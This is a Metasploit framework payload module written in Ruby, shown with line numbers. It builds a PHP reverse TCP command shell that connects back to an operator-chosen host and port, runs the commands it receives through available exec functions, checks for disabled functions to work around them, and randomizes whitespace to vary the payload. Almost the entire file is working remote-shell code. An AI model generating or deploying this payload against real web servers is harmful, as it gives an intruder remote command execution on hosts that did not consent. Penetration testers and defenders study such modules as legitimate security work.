1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = :dynamic
8

9
  include Msf::Payload::Single
10
  include Msf::Payload::Php
11
  include Msf::Sessions::CommandShellOptions
12

13
  def initialize(info = {})
14
    super(
15
      merge_info(
16
        info,
17
        'Name' => 'PHP Command Shell, Reverse TCP (via PHP)',
18
        'Description' => 'Reverse PHP connect back shell with checks for disabled functions',
19
        'Author' => 'egypt',
20
        'License' => BSD_LICENSE,
21
        'Platform' => 'php',
22
        'Arch' => ARCH_PHP,
23
        'Handler' => Msf::Handler::ReverseTcp,
24
        'Session' => Msf::Sessions::CommandShell,
25
        'PayloadType' => 'cmd',
26
        'Payload' => {
27
          'Offsets' => {},
28
          'Payload' => ''
29
        }
30
      )
31
    )
32
  end
33

34
  #
35
  # Issues
36
  #   - Since each command is executed in a new shell, 'cd' does nothing.
37
  #      Perhaps it should be special-cased to call chdir()
38
  #   - Tries to get around disable_functions but makes no attempts to
39
  #      circumvent safe mode.
40
  #
41
  def php_reverse_shell
42
    if !datastore['LHOST'] || datastore['LHOST'].empty?
43
      # datastore is empty on msfconsole startup
44
      ipaddr = '127.0.0.1'
45
      port = 4444
46
    else
47
      ipaddr = datastore['LHOST']
48
      port = datastore['LPORT']
49
    end
50
    exec_funcname = Rex::Text.rand_text_alpha(5..14)
51

52
    uri = "tcp://#{ipaddr}"
53
    socket_family = 'AF_INET'
54

55
    if Rex::Socket.is_ipv6?(ipaddr)
56
      uri = "tcp://[#{ipaddr}]"
57
      socket_family = 'AF_INET6'
58
    end
59

60
    shell = <<-END_OF_PHP_CODE
61
    #{php_preamble(disabled_varname: '$dis')}
62
    $ipaddr='#{ipaddr}';
63
    $port=#{port};
64

65
    if(!function_exists('#{exec_funcname}')){
66
      function #{exec_funcname}($c){
67
        global $dis;
68
        #{php_system_block(cmd_varname: '$c', disabled_varname: '$dis', output_varname: '$o')}
69
        return $o;
70
      }
71
    }
72
    $nofuncs='no exec functions';
73
    if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
74
      $s=@fsockopen("#{uri}",$port);
75
      while($c=fread($s,2048)){
76
        $out = '';
77
        if(substr($c,0,3) == 'cd '){
78
          chdir(substr($c,3,-1));
79
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
80
          break;
81
        }else{
82
          $out=#{exec_funcname}(substr($c,0,-1));
83
          if($out===false){
84
            fwrite($s,$nofuncs);
85
            break;
86
          }
87
        }
88
        fwrite($s,$out);
89
      }
90
      fclose($s);
91
    }else{
92
      $s=@socket_create(#{socket_family},SOCK_STREAM,SOL_TCP);
93
      @socket_connect($s,$ipaddr,$port);
94
      @socket_write($s,"socket_create");
95
      while($c=@socket_read($s,2048)){
96
        $out = '';
97
        if(substr($c,0,3) == 'cd '){
98
          chdir(substr($c,3,-1));
99
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
100
          break;
101
        }else{
102
          $out=#{exec_funcname}(substr($c,0,-1));
103
          if($out===false){
104
            @socket_write($s,$nofuncs);
105
            break;
106
          }
107
        }
108
        @socket_write($s,$out,strlen($out));
109
      }
110
      @socket_close($s);
111
    }
112
    END_OF_PHP_CODE
113

114
    # randomize the spaces a bit
115
    Rex::Text.randomize_space(shell)
116

117
    return shell
118
  end
119

120
  #
121
  # Constructs the payload
122
  #
123
  def generate(_opts = {})
124
    return super + php_reverse_shell
125
  end
126
end
127

128